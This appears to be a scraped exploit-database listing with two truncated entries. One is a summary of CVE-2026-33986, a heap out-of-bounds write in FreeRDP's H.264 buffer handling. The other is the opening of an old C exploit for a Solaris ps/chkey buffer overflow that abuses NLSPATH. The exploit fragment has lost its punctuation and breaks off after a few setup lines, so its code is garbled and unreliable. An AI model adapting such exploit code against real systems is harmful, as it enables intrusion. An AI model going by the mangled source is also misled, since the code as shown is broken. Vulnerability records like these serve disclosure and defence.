CVE-2026-33986 FreeRDP: H.264 YUV Buffer Dimension Desync - Heap OOB Write

FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to version 3.24.2, in yuvensurebuffer in libfreerdp/codec/h264.c, h264-width and h264-height are updated before the reallocation loop. If any winpralignedrecalloc call fails, the function returns FALSE but width/height are...

Solaris 2.5.0/2.5.1 ps / chkey - Data Buffer

cat psexpl.po psexpl.c include include include define BUFLENGTH 632 define EXTRA 256 int mainint argc, char argv char bufBUFLENGTH + EXTRA; / ps will grok this file for the exploit code / char envp="NLSPATH=/tmp/foo",0; ulong longp; uchar charp; / This will vary depending on your libc / ulong...